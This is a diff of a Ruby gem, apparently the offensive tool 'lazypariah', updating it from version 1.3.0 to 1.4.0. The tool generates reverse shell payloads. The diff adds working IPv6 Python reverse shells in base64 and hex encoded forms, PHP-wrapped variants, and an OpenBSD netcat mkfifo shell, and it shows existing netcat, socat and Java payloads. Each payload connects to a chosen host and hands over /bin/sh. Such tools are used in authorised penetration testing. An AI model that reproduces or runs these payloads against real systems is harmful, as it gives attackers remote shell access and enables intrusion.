lazypariah 1.3.0 → 1.4.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e56943a8844277739dcb5295fc717735adfbc10fe1408f37966e96cb0c8e3d7f
-  data.tar.gz: 97641d710be3eef0aa977131778df5a89266cd012dcb5b608b19369ff59e74cf
+  metadata.gz: aea5f9ef7a85656b9d440fc44f3c061a4a6f2a8d0172b9f5c6f8af2d831f309a
+  data.tar.gz: d60c230377cc65427a71bb76abdef639f382669370b16dca70ea8862878f5a42
 SHA512:
-  metadata.gz: 305bb9f92a1084f7dab85fcd0cea48d95540b885554d4b773ba455b4d672c44b73f2b89d3a8b7f5243ce43ba69adafbebcd18e64ed9fc6118fe6b6ecae0bf5f7
-  data.tar.gz: b4dceeef707c2100d8ef2bf36eecebe35cce7300d565c1fada02eec78057e2d2d793784cf7c143a885089ac42ddcdec59eb151c3b6f9ea85991339ec78787bfe
+  metadata.gz: 8c2e2981ac7c68c60b20c335926add3a953b8fc7829f8d6f23abe303526d578fdcaca6ef4cc04c091f174a58f0d63dcf4c836a76101819fc541583eb9f35e86d
+  data.tar.gz: c542e1c298d1466b5f4f39fafc359ff164c299dc77058fc41a93aaefbc7242ab8b5834392d98a204ac77183c20acda0cee39362d2a9d887181576c569bbae2c6

data/bin/lazypariah

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 1.3.0
+# Version: 1.4.0
 # Description:
 #	LAZYPARIAH is a simple tool for generating various reverse shell payloads
 #	on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "1.3.0".freeze()
+PROGRAM_VERSION = "1.4.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -38,6 +38,10 @@ PAYLOAD_LIST = [
 	"python_c",
 	"python_b64",
 	"python_hex",
+	"python_ipv6",
+	"python_ipv6_c",
+	"python_ipv6_b64",
+	"python_ipv6_hex",
 	"nc",
 	"nc_pipe",
 	"php_fd",
@@ -45,6 +49,8 @@ PAYLOAD_LIST = [
 	"php_fd_tags",
 	"php_system_python_b64",
 	"php_system_python_hex",
+	"php_system_python_ipv6_b64",
+	"php_system_python_ipv6_hex",
 	"perl",
 	"perl_c",
 	"perl_b64",
@@ -59,6 +65,7 @@ PAYLOAD_LIST = [
 	"java_class",
 	"c_binary",
 	"rust_binary",
+	"nc_openbsd"
 ].sort()
 
 # Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
@@ -242,25 +249,47 @@ begin
 			when "python"
 				# Python reverse shell.
 				print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6"
+				# Python IPv6 reverse shell.
+				print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_c"
 				# Python reverse shell (intended to be run as a command from a shell session).
 				print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_c"
+				# Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_b64"
 				# Base-64-encoded Python reverse shell (intended to be run as a command from a shell session).
 				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
 				print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_b64"
+				# Base-64-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+				print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_hex"
 				# Hex-encoded Python reverse shell (intended to be run as a command from a shell session).
 				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
 				print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_hex"
+				# Hex-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+				print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "php_system_python_b64"
 				# Hybrid shell: python_b64 payload contained within a system function in a miniature PHP script.
 				python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
 				print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "php_system_python_ipv6_b64"
+				# Hybrid shell: python_ipv6_b64 payload contained within a system function in a miniature PHP script.
+				python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+				print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "php_system_python_hex"
 				# Hybrid shell: python_hex payload contained within a system function in a miniature PHP script.
 				python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
 				print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "php_system_python_ipv6_hex"
+				# Hybrid shell: python_ipv6_hex payload contained within a system function in a miniature PHP script.
+				python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+				print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "nc"
 				# Netcat reverse shell.
 				print_output(s: "nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
@@ -321,6 +350,9 @@ begin
 			when "socat"
 				# Socat reverse shell.
 				print_output(s: "socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nc_openbsd"
+				# Netcat (OpenBSD) reverse shell.
+				print_output(s: "rm /tmp/r; mkfifo /tmp/r; cat /tmp/r | /bin/sh -i 2>&1 | nc #{ARGV[1]} #{ARGV[2]} > /tmp/r", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "java_class"
 				# Java class reverse shells (compiled on the fly).
 				code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-  version: 1.3.0
+  version: 1.4.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2021-03-23 00:00:00.000000000 Z
+date: 2021-03-27 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
   on the fly. It is intended to be used only in authorised circumstances by qualified